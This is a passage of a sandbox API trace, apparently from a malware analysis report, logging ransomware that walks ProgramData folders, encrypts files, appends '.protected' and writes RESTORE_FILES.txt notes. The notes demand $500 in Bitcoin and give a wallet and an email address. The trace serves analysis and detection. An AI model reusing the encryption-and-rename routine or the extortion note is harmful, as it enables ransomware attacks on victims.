1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.250] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.251] lstrlenA (lpString="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") returned 684 [0074.251] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.251] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.251] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0074.251] CloseHandle (hObject=0xa4) returned 1 [0074.252] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="Windows") returned -1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="Program Files") returned -1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="Program Files (x86)") returned -1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="$Recycle.bin") returned 1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="System Volume Information") returned -1 [0074.252] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned 83 [0074.252] lstrcmpW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2=".") returned 1 [0074.252] lstrcmpW 
(lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="..") returned 1 [0074.252] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*") returned 85 [0074.252] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.253] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.253] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.253] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.253] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.253] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.253] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\.") returned 85 [0074.253] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.253] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.253] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.253] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.253] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.253] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.253] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.253] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\..") returned 86 [0074.253] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.253] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0074.253] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.253] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.253] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0074.253] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0074.254] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.254] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.254] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned 92 [0074.254] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.254] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0074.254] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*") returned 94 [0074.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.254] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.254] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.254] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.254] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.254] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.254] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\.") returned 94 [0074.254] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.255] 
FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.255] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.255] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.255] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.255] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.255] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.255] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\..") returned 95 [0074.255] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.255] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.255] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Windows") returned -1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files") returned 1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files (x86)") returned 1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="$Recycle.bin") returned 1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="System Volume Information") returned 1 [0074.255] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned 115 [0074.255] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0074.255] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0074.255] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*") returned 117 [0074.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.256] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.256] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.256] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.256] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\.") returned 117 [0074.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.256] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.256] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.256] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.256] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.256] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\..") returned 118 [0074.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.256] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | 
out: lpFindFileData=0x295ecb0) returned 1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0074.256] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.256] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0074.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.256] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.257] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0074.257] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.257] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package 
Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0074.257] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.257] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0074.257] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0074.257] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.277] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.277] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.278] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.278] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.283] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.283] CloseHandle (hObject=0xd8) returned 1 [0074.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 134 [0074.284] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.protected")) returned 1 [0074.285] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.285] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Windows") returned -1 [0074.304] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files") returned 1 [0074.304] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files (x86)") returned 1 [0074.304] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="$Recycle.bin") returned 1 [0074.304] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="System Volume Information") returned 1 [0074.304] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 141 [0074.304] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".protected") returned 0x0 [0074.304] lstrcmpW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.304] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.304] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295ec74*=0x30) returned 1 [0074.304] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.324] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 141 [0074.324] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".txt") returned 0x0 [0074.324] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 141 [0074.324] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".rar") returned 0x0 [0074.324] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 141 [0074.324] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".zip") returned 0x0 [0074.340] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.365] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.365] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, 
lpOverlapped=0x0) returned 1 [0074.386] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.430] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.430] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.430] CloseHandle (hObject=0xd8) returned 1 [0074.431] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 151 [0074.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.protected")) returned 1 [0074.450] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.450] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.450] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 133 [0074.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0074.498] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.498] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0074.499] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.499] WriteFile (in: hFile=0xd4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0074.499] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.499] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0074.499] CloseHandle (hObject=0xd4) returned 1 [0074.500] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0074.500] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0074.500] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 110 [0074.500] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0074.500] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back 